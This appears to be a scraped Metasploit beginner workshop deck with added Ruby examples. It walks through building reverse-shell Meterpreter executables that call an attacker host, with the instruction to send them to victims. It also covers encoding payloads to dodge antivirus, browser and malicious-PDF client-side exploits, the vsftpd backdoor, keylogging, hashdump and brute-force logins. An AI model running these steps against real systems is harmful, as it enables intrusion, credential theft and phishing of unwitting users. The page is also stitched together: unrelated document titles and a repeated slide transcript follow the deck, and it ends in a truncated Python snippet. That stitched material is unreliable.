Metasploit Humla for Beginner
By: Ajay Srivastava

Please don't expect ...
- How to evade antiviruses (antivirus evasion)
- How to do pivoting
- How to do port forwarding
- How to write your own Metasploit module

Disclaimer
All the information and techniques you will learn here are for educational purposes and must not be used for malicious activities.

Agenda
- Introduction
- Basics of Metasploit
- Information gathering
- Exploitation
- (11:30-11:45 - Break 1 / Tea)*
- Meterpreter basics
- Post exploitation using Meterpreter
- Meterpreter scripts
- (1:00-2:00 - Break 2 / Lunch)*

Agenda
- Metasploit utilities
- Client-side exploitation
- (4:00-4:20 - Break 3 / Tea)*
- Auxiliary modules
- And we are done
- * Lunch and tea are self-sponsored.
Introduction
- It's not a tool, it's a framework!

History
- Developed by H.D. Moore in 2003
- Originally written in Perl, later rewritten in Ruby
- Acquired by Rapid7 in 2009
- Remains open source and free to use

Metasploit Architecture

Libraries
- Rex:
  - The basic library for most tasks
  - Handles sockets, protocols and text transformations
- MSF Core:
  - Defines the Metasploit Framework
  - Provides the 'basic' API
- MSF Base:
  - Provides the 'friendly' API
  - Provides simplified APIs for use in the Framework
Modules
- Exploit
  - Modules that actually attack a target system and obtain access by delivering a payload.
- Payload
  - Code that executes on the remote system after successful exploitation.
- Auxiliary
  - Modules without a payload: scanners, fuzzers, brute-forcers and various other tasks.

Modules
- Encoders
  - Transform the payload bytes and prepend a decoder stub that restores them in memory at run time. Their real job is to keep bad characters (a null byte, a newline) out of the payload so the exploit's input handling does not truncate it. They are often sold as antivirus evasion, but the decoder stub itself is well known to AV engines, so do not count on them for that.
- Nops
  - Generate no-operation instructions, used to pad the payload to a consistent size and to build NOP sleds.
Payloads
- Single
  - Completely standalone; carries everything it needs to do its job
  - e.g. add a user
- Stagers
  - Small payload that only sets up the network connection between attacker and target
- Stages
  - Downloaded over that connection by the stager
  - e.g. Meterpreter

Payloads
- A payload is staged when stage and stager are separate path segments, i.e. there is an extra '/' between them in the payload name; a single payload fuses them into one segment with '_'
- windows/shell_bind_tcp
  - single payload with no stage
- windows/shell/bind_tcp
  - a stager (bind_tcp)
  - a stage (shell)
Interfaces
- msfconsole
- msfcli
- msfweb
- Armitage

msfconsole
- Most powerful of all the interfaces
- msfcli and msfweb have since been removed from the framework; `msfconsole -x '<commands>'` covers the msfcli use case

msfcli

msfweb

Armitage
- Graphical front end for Metasploit
- Developed by Raphael Mudge
- Supports both GUI and CLI

Armitage
Basic Commands
- # msfconsole
- # msfupdate
- msfconsole commands are classified into two types:
  - Core commands
  - Database commands

Core Commands
- help or ?
- banner
- version
- show
- search
  - msf > search <module name>
- info
  - msf > info <module name>
- use
  - msf > use <exploit/auxiliary name>

Core Commands
- back
- show options
- set (option for the current module only)
  - msf > set <option> <value>
- setg (global option, kept when you switch modules)
  - msf > setg <option> <value>
- unset
  - msf > unset <option>
- unsetg
  - msf > unsetg <option>

Core Commands
- show payloads
- set payload
  - msf > set payload <payload name>
- check
- exploit
- run
Database Commands
- Default database: PostgreSQL
- database.yml
  - /opt/metasploit/apps/pro/ui/config/database.yml (this is the Metasploit Pro layout; on a Kali install the file lives in the framework's config directory and `msfdb init` creates it)
  - # cat database.yml
- db_status
- db_disconnect

Database Commands
- db_connect
  - msf > db_connect user:pass@localhost:port/dbname
  - or
  - msf > db_connect -y <path to database.yml>

Database Commands
- db_nmap (runs nmap and imports the results into the hosts and services tables)
  - msf > db_nmap -sV -A -O <ip range>
- hosts
  - msf > hosts -h
- services
  - msf > services

Database Commands
- vulns
- db_export
- db_import (accepts nmap XML, among other formats)
- db_rebuild_cache
- creds
- db_load
- db_unload
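What `db_nmap` and `db_import` actually do with a scan is flatten nmap's XML into one hosts row per `<host>` and one services row per `<port>`, which is what `hosts` and `services` then print and filter. The Ruby below is an added example, not part of the original deck or of the framework's own importer: it parses a constructed nmap XML sample (two hosts on the 192.168.37.0/24 range used later in the slides, one of them down) with the standard REXML library and reproduces the `services -p <port>` / `services -s <name>` / `-u` filtering. The `Host` and `Service` structs and the `services_on` function are names chosen here, not framework APIs.

```ruby
require 'rexml/document'

# Constructed sample of `nmap -sV -oX -` output (not a real scan).
SAMPLE_NMAP_XML = <<~XML
  <?xml version="1.0"?>
  <nmaprun scanner="nmap" args="nmap -sV -oX - 192.168.37.0/24">
    <host>
      <status state="up"/>
      <address addr="192.168.37.20" addrtype="ipv4"/>
      <hostnames><hostname name="metasploitable" type="PTR"/></hostnames>
      <ports>
        <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4"/></port>
        <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1"/></port>
        <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql" product="MySQL" version="5.0.51a"/></port>
        <port protocol="tcp" portid="8080"><state state="closed"/><service name="http-proxy"/></port>
      </ports>
    </host>
    <host>
      <status state="down"/>
      <address addr="192.168.37.21" addrtype="ipv4"/>
    </host>
  </nmaprun>
XML

Host    = Struct.new(:address, :name, :state)
Service = Struct.new(:host, :port, :proto, :state, :name, :info)

# One Host row per <host> and one Service row per <port>: the shape of the
# hosts and services tables that db_import fills.
def parse_nmap_xml(xml)
  doc = REXML::Document.new(xml)
  hosts, services = [], []
  doc.elements.each('nmaprun/host') do |h|
    addr  = h.elements['address'].attributes['addr']
    state = h.elements['status'].attributes['state']
    hn    = h.elements['hostnames/hostname']
    hosts << Host.new(addr, hn ? hn.attributes['name'] : nil, state)
    h.elements.each('ports/port') do |p|
      svc  = p.elements['service']
      info = svc ? [svc.attributes['product'], svc.attributes['version']].compact.join(' ') : ''
      services << Service.new(addr,
                              p.attributes['portid'].to_i,
                              p.attributes['protocol'],
                              p.elements['state'].attributes['state'],
                              svc ? svc.attributes['name'] : nil,
                              info)
    end
  end
  [hosts, services]
end

# The filtering behind `services -p <port>`, `services -s <name>` and `-u`
# (open services only). open_only defaults to true because closed ports are
# almost never what you want to look at.
def services_on(services, port: nil, name: nil, open_only: true)
  services.select do |s|
    (port.nil? || s.port == port) &&
      (name.nil? || s.name == name) &&
      (!open_only || s.state == 'open')
  end
end

if __FILE__ == $PROGRAM_NAME
  hosts, services = parse_nmap_xml(SAMPLE_NMAP_XML)
  puts 'Hosts'
  hosts.each { |h| puts format('  %-16s %-16s %s', h.address, h.name.to_s, h.state) }
  puts 'Services (open)'
  services_on(services).each do |s|
    puts format('  %-16s %5d/%s %-8s %s', s.host, s.port, s.proto, s.name.to_s, s.info)
  end
end
```

The `info` column is the product and version string that `services` shows and that the version-scanner modules later in the deck would otherwise have to fetch again; it is also what you grep when looking for an exploit to match a service.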
Information Gathering
- Auxiliary modules are the best!
- Covered in detail later
- Using auxiliary/scanner/portscan/tcp
  - msf > use auxiliary/scanner/portscan/tcp
- or
  - nmap <switches> <ip address>
Exploitation
- To list available exploits:
  - msf > search <exploit name>
- To select an exploit:
  - msf > use <exploit name>
- To get information about the selected exploit:
  - msf exploit(name) > info
- To check the options and set arguments:
  - msf exploit(name) > show options
- To set the target host:
  - msf exploit(name) > set rhost <victim ip>

Exploitation
- To list the payloads supported by the selected exploit:
  - msf exploit(name) > show payloads
- To set the payload:
  - msf exploit(name) > set payload <payload name>
- To set the attacker machine (the address a reverse payload connects back to):
  - msf exploit(name) > set lhost <own ip>
- To check whether the target is vulnerable to the selected exploit (not every module implements check):
  - msf exploit(name) > check
- To launch the attack:
  - msf exploit(name) > exploit
Meterpreter
- Post-exploitation payload, delivered as a stage
- Runs in the context of the exploited process
- The stage is loaded reflectively into memory and writes nothing to disk (a stager you deliver as an .exe is, of course, a file on disk)
- Encrypted communication with the handler
- Stable and extensible

Meterpreter
- Classification
  - Core commands
  - File system commands
  - System commands
  - User interface commands
  - Privilege commands
  - Networking commands
Meterpreter : Core commands
- background
- sessions
- ps
- migrate
- bgrun/bglist/bgkill
- resource

Meterpreter : Core commands
- run
  - meterpreter > run <script name>
- channel
  - meterpreter > execute -f <program> -c (runs the program with a channel attached; channel -l lists open channels)
- use (alias of load; loads an extension such as stdapi or priv)
  - meterpreter > use <extension name>
Meterpreter : File System Commands
- pwd
- cd
- getlwd/lcd (print and change the local working directory on the attacker side)
- ls
- cat/edit
- download/upload

Meterpreter : File System Commands
- search
  - meterpreter > search -d <directory> -f *.<extension> -r
- mkdir/rmdir
- rm/del
Meterpreter : System Commands
- sysinfo
- getpid/getuid
- shell
- reboot
- shutdown
- ps

Meterpreter : UI Commands
- User interface and webcam commands
- idletime
- keyscan_start
- keyscan_dump
- keyscan_stop
- webcam_list
- webcam_snap

Meterpreter : Priv Commands
- getsystem
- hashdump
- timestomp
  - timestomp -h
  - timestomp <filepath> -v (display all MACE attributes)
  - timestomp <filepath> -c "MM/DD/YYYY HH24:MI:SS" (set the creation time)
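Anyone using timestomp should also know how it is caught. NTFS keeps two sets of timestamps per file: $STANDARD_INFORMATION, which is what Explorer shows and what timestomp rewrites, and $FILE_NAME, which only the kernel updates. The Ruby below is an added detection example, not from the deck or the framework: it runs three well-known timestomp indicators over two constructed MFT-style records (a clean system file, and a dropped binary whose creation time was pushed back to 2009 with `timestomp <file> -c`). The `Record` struct, the `ntfs_time` helper and the indicator names are chosen here; the timestamps are invented for illustration.

```ruby
# NTFS stores timestamps as 100 ns ticks. Ruby's Time keeps nanoseconds, so a
# value with a zero fractional part is distinguishable from the sub-second
# noise a real file write leaves behind.
def ntfs_time(y, mo, d, h, mi, s, ticks = 0)
  Time.utc(y, mo, d, h, mi, s) + Rational(ticks, 10_000_000)
end

Record = Struct.new(:path,
                    :si_created, :si_modified, :si_accessed, :si_mft_modified,  # $STANDARD_INFORMATION
                    :fn_created, :fn_modified)                                  # $FILE_NAME

# Constructed records (not from a real image).
LEGIT = Record.new('C:\\Windows\\System32\\calc.exe',
                   ntfs_time(2009, 7, 14, 1, 14, 13, 9_876_543),
                   ntfs_time(2009, 7, 14, 1, 14, 13, 9_876_543),
                   ntfs_time(2014, 3, 10, 8, 2, 44, 1_204_211),
                   ntfs_time(2009, 7, 14, 1, 14, 13, 9_876_543),
                   ntfs_time(2009, 7, 14, 1, 14, 13, 9_876_543),
                   ntfs_time(2009, 7, 14, 1, 14, 13, 9_876_543))

# Written on 2014-03-11, then `timestomp ... -c "01/01/2009 00:00:00"`.
STOMPED = Record.new('C:\\Users\\bob\\AppData\\Local\\Temp\\svchost.exe',
                     ntfs_time(2009, 1, 1, 0, 0, 0),                      # backdated, no sub-second part
                     ntfs_time(2014, 3, 11, 10, 15, 32, 4_412_345),
                     ntfs_time(2014, 3, 11, 10, 15, 32, 4_412_345),
                     ntfs_time(2014, 3, 11, 10, 16, 1, 7_710_002),
                     ntfs_time(2014, 3, 11, 10, 15, 32, 4_412_345),         # $FILE_NAME still says 2014
                     ntfs_time(2014, 3, 11, 10, 15, 32, 4_412_345))

# Indicators, strongest first. None is proof on its own: restores from backup,
# some installers and file moves can produce the first two legitimately, so a
# hit is a lead for triage, not a verdict.
def timestomp_indicators(r)
  si = [r.si_created, r.si_modified, r.si_accessed, r.si_mft_modified]
  flags = []
  # $FILE_NAME is not reachable through the API timestomp uses, so a $SI
  # creation time earlier than the $FN creation time means $SI was edited.
  flags << :si_created_before_fn_created if r.si_created < r.fn_created
  # timestomp takes its timestamp at one-second granularity, so the 100 ns field is zero.
  flags << :zero_fraction_seconds if si.any? { |ts| ts.nsec.zero? }
  # `timestomp -z` writes one value into all four $SI fields at once.
  flags << :all_si_times_identical if si.uniq.size == 1 && r.fn_created != r.si_created
  flags
end

# Only the records that raised at least one indicator, keyed by path.
def scan(records)
  records.each_with_object({}) do |r, out|
    flags = timestomp_indicators(r)
    out[r.path] = flags unless flags.empty?
  end
end

if __FILE__ == $PROGRAM_NAME
  scan([LEGIT, STOMPED]).each { |path, flags| puts "#{path}: #{flags.join(', ')}" }
end
```

On a real case the records come from an MFT parser rather than from literals, but the comparisons are the same, and the $FILE_NAME check is the one that survives every option timestomp offers.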
Meterpreter : Networking commands
- arp
- ipconfig/ifconfig
- netstat
- route
- portfwd
Meterpreter scripts
- Path:
  - /usr/share/metasploit-framework/scripts/meterpreter
- or
  - meterpreter > run <tab multiple times>
- These scripts are deprecated in favour of post modules (run post/<os>/gather/...), but most still work

Meterpreter scripts: run <script name>
- run checkvm
- run credcollect
- run keylogrecorder
- run winenum
- run getcountermeasure
- run getgui

Meterpreter scripts
- run scraper
- run hostsedit
- run gettelnet
- run arp_scanner
- run vnc
- run file_collector
  - meterpreter > run file_collector -d <directory> -f *.txt -r
Metasploit Utilities
- Three main utilities to generate shellcode and encode it:
- msfpayload
- msfencode
- msfvenom
- msfpayload and msfencode were removed from the framework in 2015; msfvenom now does both jobs (-p payload, -f format, -e encoder, -i iterations, -o output file). The commands on the next slides are the original ones.

Msfpayload
- Generates a payload in different formats such as exe, C, Ruby and JavaScript
- Using msfpayload:
  - root@kali:~# msfpayload -h
- To check the options:
  - root@kali:~# msfpayload <payload name> O
  - root@kali:~# msfpayload windows/meterpreter/reverse_tcp O
- Setting the options and writing a Windows executable:
  - root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 X > exploit.exe
- Send this exploit.exe to the victim
Using the multi/handler exploit / setting up the listener
- Set up the listener:
  - msf > search multi/handler
  - msf > use exploit/multi/handler
  - msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  - msf exploit(handler) > show options
  - msf exploit(handler) > set lhost <attacker ip>
  - msf exploit(handler) > set lport 4422
  - msf exploit(handler) > exploit
- The payload, LHOST and LPORT must match what was baked into exploit.exe, or the connection back is never caught.
MSFEncode
- Usually described as a way to bypass antivirus
- What it actually does: transforms the payload bytes with an encoder and prepends a small decoder stub; when the executable runs, the stub decodes the original bytes in memory and jumps to them.
- Several encoders are available. The original purpose is avoiding bad characters, and because the decoder stub is constant, AV engines signature the stub itself; encoding alone rarely gets past a current product.

MSFEncode
- root@kali:~# msfencode -h
- Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>
- OPTIONS:
  - -e <opt>  The encoder to use
  - -c <opt>  The number of times to encode the data
  - -t <opt>  The output format: bash,c,java,perl,pl,py,python,raw,sh,vbscript,asp,aspx,exe
  - -x <opt>  Specify an alternate executable template
  - -k        Keep template working; run payload in new thread (use with -x)

MSFEncode
- List encoders:
  - root@kali:~# msfencode -l
- msfencode with msfpayload:
  - root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe > /var/www/exploitbypass.exe
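To see what an encoder and the `-c` iteration count really do, here is the idea reduced to a few lines of Ruby. This is an added example, not from the deck and not the framework's shikata_ga_nai (which uses a 32-bit additive key and a randomised decoder stub); it applies a one-byte feedback-XOR round to a constructed stand-in for a payload that deliberately contains the classic bad characters, searches for a key that keeps them out of the output (the same search an encoder performs, and the same failure when no key works), and stacks rounds the way `-c N` does. `PAYLOAD`, `BADCHARS` and every function name below are chosen here.

```ruby
# Constructed stand-in for a payload (not shellcode): a dozen bytes that
# deliberately include the classic bad characters 0x00, 0x0a and 0x0d.
PAYLOAD  = [0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x00, 0x0a, 0x0d, 0xff].pack('C*')
BADCHARS = [0x00, 0x0a, 0x0d]

# One encoder round: XOR each byte with a one-byte key, then fold the
# ciphertext byte back into the key. The decoder can follow along because it
# sees the same ciphertext, so only the initial key has to travel in the stub.
def feedback_xor_encode(plain, key)
  plain.bytes.map do |b|
    c = b ^ key
    key = (key + c) & 0xff
    c
  end.pack('C*')
end

def feedback_xor_decode(enc, key)
  enc.bytes.map do |c|
    b = c ^ key
    key = (key + c) & 0xff
    b
  end.pack('C*')
end

# Try every one-byte key until the ciphertext, and the key byte the decoder
# stub would embed, are free of bad characters. Raising when no key works is
# the "encoder failed" case msfencode reports.
def encode_avoiding(plain, badchars)
  (1..255).each do |key|
    next if badchars.include?(key)
    enc = feedback_xor_encode(plain, key)
    next unless (enc.bytes & badchars).empty?
    return [key, enc]
  end
  raise "no key avoids #{badchars.map { |b| format('0x%02x', b) }.join(' ')}"
end

# `msfencode -c N`: run the encoder N times, each round over the previous
# output, and keep the keys so the rounds can be undone in reverse order.
def encode_rounds(plain, badchars, rounds)
  keys = []
  enc  = plain
  rounds.times do
    key, enc = encode_avoiding(enc, badchars)
    keys << key
  end
  [keys, enc]
end

def decode_rounds(enc, keys)
  keys.reverse.reduce(enc) { |data, key| feedback_xor_decode(data, key) }
end

if __FILE__ == $PROGRAM_NAME
  keys, enc = encode_rounds(PAYLOAD, BADCHARS, 3)
  puts "keys:     #{keys.map { |k| format('0x%02x', k) }.join(' ')}"
  puts "encoded:  #{enc.unpack1('H*')}"
  puts "original: #{PAYLOAD.unpack1('H*')}"
  puts "round trip ok: #{decode_rounds(enc, keys) == PAYLOAD}"
end
```

Note what changes between rounds and what does not: the encoded bytes differ every time, but a real decoder stub is a fixed instruction sequence in front of them, which is why signatures target the stub and `-c 8` adds little against a current engine.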
Client-side Attacks
- Server-side vulnerabilities are harder to find
- Most enterprises have incoming connections locked down with firewalls
- Client-side attacks are therefore the most common:
  - Browser-based attacks
  - Social engineering attacks using a malicious link or file

Client-side Attacks: Browser based
- Using the IE 6 Aurora exploit (MS10-002)
  - msf > search aurora
  - msf > use exploit/windows/browser/ms10_002_aurora
  - msf exploit(ms10_002_aurora) > show options
  - msf exploit(ms10_002_aurora) > set srvhost <attacker ip>
  - msf exploit(ms10_002_aurora) > set srvport 80
  - msf exploit(ms10_002_aurora) > set uripath /test

Client-side Attacks: Browser based
  - msf exploit(ms10_002_aurora) > show options
  - msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
  - msf exploit(ms10_002_aurora) > show options
  - msf exploit(ms10_002_aurora) > set lhost <own ip>
  - msf exploit(ms10_002_aurora) > set lport 443
  - msf exploit(ms10_002_aurora) > exploit
- Browser modules start their own web server and the payload handler; the victim is lured to http://<attacker ip>:80/test and the session arrives on port 443.
Client-side Attacks: File Format
- File-format exploits are widely used against real targets.
- Files such as PDF, DOC or RTF are sent as attachments and the victim is expected to open them.
- For example:
  - Adobe util.printf() buffer overflow vulnerability
  - MS14-017 Microsoft Word RTF object confusion

Client-side Attacks: File Format
- Exploiting the Adobe util.printf() buffer overflow vulnerability:
  - msf > search adobe_utilprintf
  - msf > use exploit/windows/fileformat/adobe_utilprintf
  - msf exploit(adobe_utilprintf) > set filename resume.pdf
  - msf exploit(adobe_utilprintf) > show options
  - msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp

Client-side Attacks: File Format
  - msf exploit(adobe_utilprintf) > setg lhost <attacker ip>
  - msf exploit(adobe_utilprintf) > set lport 443
  - msf exploit(adobe_utilprintf) > exploit
- Set up a listener (multi/handler): file-format modules only write the file, they do not start a handler.
- Send resume.pdf to the target with a social engineering pretext.

Client-side Attacks: File Format
- Setting up the listener on the local machine (the payload must be the one the PDF was built with):
  - msf > search multi/handler
  - msf > use exploit/multi/handler
  - msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  - msf exploit(handler) > show options
  - msf exploit(handler) > set lhost <own ip>
  - msf exploit(handler) > set lport 443
  - msf exploit(handler) > exploit
Auxiliary Modules
- Pre-exploitation modules
- Port scanners, fuzzers, banner grabbers, brute-force modules etc.
- Path:
  - /usr/share/metasploit-framework/modules/auxiliary
- or
- Using show auxiliary in msfconsole:
  - msf > show auxiliary
- Used without payloads

Auxiliary Modules
- Used the same way as exploits, but without a payload
  - msf > use <auxiliary name>
- 'run' command instead of 'exploit' command
- RHOSTS (a single address, a range or a CIDR block) instead of RHOST
Auxiliary Modules : Port scanners
- The portscan auxiliary modules are used for port scanning
- Using the TCP port scanner:
  - msf > search portscan
  - msf > use auxiliary/scanner/portscan/tcp
  - msf auxiliary(tcp) > show options
  - msf auxiliary(tcp) > set rhosts <target>
  - msf auxiliary(tcp) > set ports 1-100
  - msf auxiliary(tcp) > set threads 10
  - msf auxiliary(tcp) > run

Auxiliary Modules : SMB version fingerprinting
  - msf > search smb_version
  - msf > use auxiliary/scanner/smb/smb_version
  - msf auxiliary(smb_version) > show options
  - msf auxiliary(smb_version) > set rhosts 192.168.37.0/24
  - msf auxiliary(smb_version) > set threads 10
  - msf auxiliary(smb_version) > run

Auxiliary Modules : Version Scanner
- Banner grabbing on a MySQL server:
  - msf > search mysql
  - msf > use auxiliary/scanner/mysql/mysql_version
  - msf auxiliary(mysql_version) > show options
  - msf auxiliary(mysql_version) > set rhosts <target>
  - msf auxiliary(mysql_version) > run
Auxiliary Modules : Login Scanners
- Testing a login attack on MySQL:
  - msf > use auxiliary/scanner/mysql/mysql_login
  - msf auxiliary(mysql_login) > show options
  - msf auxiliary(mysql_login) > setg rhosts <target>
  - msf auxiliary(mysql_login) > set user_file userfile.txt

Auxiliary Modules : Login Scanners
  - msf auxiliary(mysql_login) > set pass_file passfile.txt
  - msf auxiliary(mysql_login) > set stop_on_success true
  - msf auxiliary(mysql_login) > run
- stop_on_success ends the scan of a host at the first valid credential; leave it false to enumerate every account. Login scanners can lock accounts out, so check the lockout policy before pointing them at production systems.

Auxiliary Modules : Telnet
  - msf > search telnet_login
  - msf > use auxiliary/scanner/telnet/telnet_login
  - msf auxiliary(telnet_login) > show options
  - msf auxiliary(telnet_login) > setg rhosts <target ip>
  - msf auxiliary(telnet_login) > set user_file userfile.txt

Auxiliary Modules : Telnet
  - msf auxiliary(telnet_login) > set pass_file passfile.txt
  - msf auxiliary(telnet_login) > set stop_on_success true
  - msf auxiliary(telnet_login) > run
- Verify:
  - root@kali:~# telnet <target ip>
Auxiliary Modules : Attacking FTP
  - msf > search ftp_version
  - msf > use auxiliary/scanner/ftp/ftp_version
  - msf auxiliary(ftp_version) > show options
  - msf auxiliary(ftp_version) > set rhosts <target>
  - msf auxiliary(ftp_version) > run
- Result on Metasploitable 2: FTP Banner: '220 (vsFTPd 2.3.4)'

Auxiliary Modules : Attacking FTP
- Now checking for FTP logins:
  - msf > search ftp_login
  - msf > use auxiliary/scanner/ftp/ftp_login
  - msf auxiliary(ftp_login) > set rhosts <target ip>
  - msf auxiliary(ftp_login) > set user_file userfile.txt
  - msf auxiliary(ftp_login) > set pass_file passfile.txt
  - msf auxiliary(ftp_login) > set stop_on_success true
  - msf auxiliary(ftp_login) > run
- Successful FTP login for 'msfadmin':'msfadmin'

Auxiliary Modules : Attacking FTP
- From the FTP version scan we know the server is vsFTPd 2.3.4
- Now look for an exploit for this version:
  - msf > search vsftpd
  - msf > use exploit/unix/ftp/vsftpd_234_backdoor
  - msf exploit(vsftpd_234_backdoor) > show options
  - msf exploit(vsftpd_234_backdoor) > set rhost <target ip>
  - msf exploit(vsftpd_234_backdoor) > show payloads
  - msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
  - msf exploit(vsftpd_234_backdoor) > exploit
- Caveat: the backdoor was in a trojaned vsftpd 2.3.4 tarball that was distributed for only a few days in mid-2011, not in every 2.3.4 build (Metasploitable 2 ships the backdoored one). A banner match is a reason to try the module, not proof that the host is exploitable.
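The three FTP steps above, and the MySQL and Telnet login scans before them, share two pieces of logic that the slides only show as console commands: pulling a product and version out of a greeting banner (ftp_version), and walking USER_FILE x PASS_FILE with the STOP_ON_SUCCESS, BLANK_PASSWORDS and USER_AS_PASS options (every *_login scanner). The Ruby below is an added example, not part of the deck and not the framework's own scanner code. The network is replaced by a constructed `FakeFtp` struct that returns the Metasploitable 2 banner and accepts the credential the ftp_login run found, so the logic runs offline; `ftp_version`, `login_scan` and the user and password lists are names and data chosen here.

```ruby
# Constructed stand-in for the target (not a live host): the 220 greeting
# Metasploitable 2 returns and the accounts ftp_login would find. A real
# scanner connects to port 21, reads the banner and sends USER/PASS.
FakeFtp = Struct.new(:banner, :valid) do
  def login(user, pass)
    valid.include?([user, pass])
  end
end

TARGET = FakeFtp.new("220 (vsFTPd 2.3.4)\r\n",
                     [%w[msfadmin msfadmin], %w[user user]])

# What ftp_version does with the greeting: pull a product name and a dotted
# version out of it. Returns nil for banners without a version, such as
# "220 Microsoft FTP Service", so callers cannot match on a missing value.
def ftp_version(banner)
  m = banner.match(/\A220[ -]\(?([A-Za-z][\w.-]*?)\s+v?(\d+(?:\.\d+)+)/)
  m && { product: m[1], version: m[2] }
end

# Option semantics of the *_login scanners: every USER_FILE x PASS_FILE pair,
# with the BLANK_PASSWORDS and USER_AS_PASS guesses tried first for each user.
# STOP_ON_SUCCESS ends the whole run at the first hit; otherwise one valid
# password per user is recorded and the scan moves on to the next user.
def login_scan(target, users, passes, stop_on_success: true,
               blank_passwords: false, user_as_pass: false)
  found    = []
  attempts = 0
  users.each do |u|
    candidates = []
    candidates << '' if blank_passwords
    candidates << u  if user_as_pass
    candidates.concat(passes)
    candidates.uniq.each do |p|
      attempts += 1
      next unless target.login(u, p)
      found << [u, p]
      return { found: found, attempts: attempts } if stop_on_success
      break
    end
  end
  { found: found, attempts: attempts }
end

if __FILE__ == $PROGRAM_NAME
  puts "banner #{TARGET.banner.strip.inspect} -> #{ftp_version(TARGET.banner).inspect}"
  users  = %w[root msfadmin user]     # contents of userfile.txt (constructed)
  passes = %w[toor password msfadmin user]   # contents of passfile.txt (constructed)
  puts "stop_on_success=true:  #{login_scan(TARGET, users, passes, stop_on_success: true).inspect}"
  puts "stop_on_success=false: #{login_scan(TARGET, users, passes, stop_on_success: false).inspect}"
end
```

The attempt counter is the number a lockout policy sees: with the lists above, `stop_on_success` true stops after 7 guesses, false runs 11 and finds both accounts. The parsed `{product, version}` pair is what you compare against module names with `search`, keeping the caveat above about 2.3.4 in mind.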
References
- Metasploit Guide, http://packetstormsecurity.com/files/119280
- SecurityTube Metasploit Framework Expert (SMFE) course by Vivek Ramachandran
- Metasploit Unleashed, http://www.offensive-security.com/metasploit-unleashed/Main_Page
Metasploit Humla for Beginner
Sanyam Choudhary Chemistry practical.pdf
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communication
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK  LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK  LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdf
 

Metasploit Humla for Beginner

1. By: Ajay Srivastava

2. Please don't expect ....
  • How to evade antiviruses (antivirus evasion)
  • How to do pivoting
  • How to do port forwarding
  • How to write your own Metasploit module

3. Disclaimer
  • All the information and techniques you will learn here are for educational purposes only and must not be used for malicious activities.

4. Agenda
  • Introduction
  • Basics of Metasploit
  • Information gathering
  • Exploitation
  • (11:30-11:45 - Break 1 / Tea)*
  • Meterpreter basics
  • Post exploitation using Meterpreter
  • Meterpreter scripts
  • (1:00-2:00 - Break 2 / Lunch)*

5. Agenda
  • Metasploit utilities
  • Client-side exploitation
  • (4:00-4:20 - Break 3 / Tea)*
  • Auxiliary modules
  • And we are done :)
  • * Lunch and tea are self-sponsored.

6. Introduction
  • It's not a tool, it's a framework!

7. History
  • Developed by H.D. Moore in 2003
  • Originally written in Perl, later rewritten in Ruby
  • Acquired by Rapid7 in 2009
  • Remains open source and free to use

9. Libraries
  • Rex:
    • The basic library for most tasks
    • Handles sockets and protocols
  • MSF Core:
    • Defines the Metasploit Framework
    • Provides the 'basic' API
  • MSF Base:
    • Provides the 'friendly' API
    • Provides simplified APIs for use in the Framework

10. Modules
  • Exploit
    • Modules used for actually attacking systems and gaining access.
  • Payload
    • Piece of code which executes on the remote system after successful exploitation.
  • Auxiliary
    • Exploit without a payload. Used for scanning, fuzzing and various other tasks.

11. Modules
  • Encoders
    • Programs which encode our payload to avoid antivirus detection
  • Nops
    • Used to keep payload size consistent

12. Payloads
  • Single
    • Completely standalone
    • eg: Add user
  • Stagers
    • Create the network connection
  • Stages
    • Downloaded by the stagers
    • eg: Meterpreter

13. Payloads
  • A payload is staged if its name has a '/' between stage and stager
  • windows/shell_bind_tcp
    • single payload with no stage
  • windows/shell/bind_tcp
    • a stager (bind_tcp)
    • a stage (shell)
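As an added example (not from the slides and not Metasploit's own code), the Python below applies slide 13's naming rule to classify a payload name as single or staged and then states the network behaviour a defender should expect from the LHOST/LPORT values that the later multi/handler slides set. The architecture list and the wording of `expected_artifact` are my assumptions, not framework output.

```python
from dataclasses import dataclass
from typing import Optional

# Architecture tokens that may sit between platform and stage (assumption: this
# short list covers the payload names used on the slides).
ARCHES = {"x86", "x64", "armle", "aarch64", "mipsle", "mipsbe"}


@dataclass
class PayloadInfo:
    platform: str
    arch: Optional[str]
    kind: str                 # "single" or "staged"
    stage: str                # what finally runs: shell, meterpreter, adduser, ...
    stager: Optional[str]     # the connector, e.g. bind_tcp or reverse_https
    direction: Optional[str]  # "reverse" = victim connects out, "bind" = victim listens
    transport: Optional[str]  # tcp, http, https, ...


def _split_connector(token: str):
    """'reverse_https' -> ('reverse', 'https'); 'bind_tcp' -> ('bind', 'tcp')."""
    direction, _, transport = token.partition("_")
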